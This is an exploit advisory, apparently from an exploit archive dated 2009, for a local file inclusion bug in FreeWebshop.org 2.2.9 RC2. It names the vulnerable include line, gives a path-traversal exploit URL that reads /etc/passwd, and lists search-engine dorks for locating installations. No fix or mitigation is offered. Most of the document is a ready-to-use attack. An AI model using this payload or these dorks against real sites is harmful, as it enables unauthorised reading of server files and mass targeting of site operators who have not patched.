FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability

2009-04-15 18:01:23

=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::FreeWebshop.org 2..2.9_R2
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /includes/startmodules.inc.php line 31;

include ("./".$lang_file);

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"FreeWebshop.org | This is the Footer | ©2008-2009"
"FreeWebshop.org | This is the Footer |"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.